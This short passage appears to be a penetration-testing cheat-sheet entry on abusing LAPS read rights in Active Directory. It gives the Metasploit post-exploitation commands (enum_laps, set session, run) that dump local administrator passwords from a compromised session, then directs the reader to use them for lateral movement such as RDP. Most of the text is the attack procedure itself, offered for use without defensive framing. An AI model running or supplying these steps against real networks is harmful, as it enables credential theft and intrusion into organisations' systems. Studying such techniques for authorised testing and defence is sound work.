If user is in PswReaders group, then you can read LAPS passwords. To abuse this with a metasploit shell:
use windows/gather/credentials/enum_laps
msf5 post(windows/gather/credentials/enum_laps) > set session #
session => #
msf5 post(windows/gather/credentials/enum_laps) > run
Enumerate hosts that you have the local admin password to and move laterally based on open connections. For example: (RDP)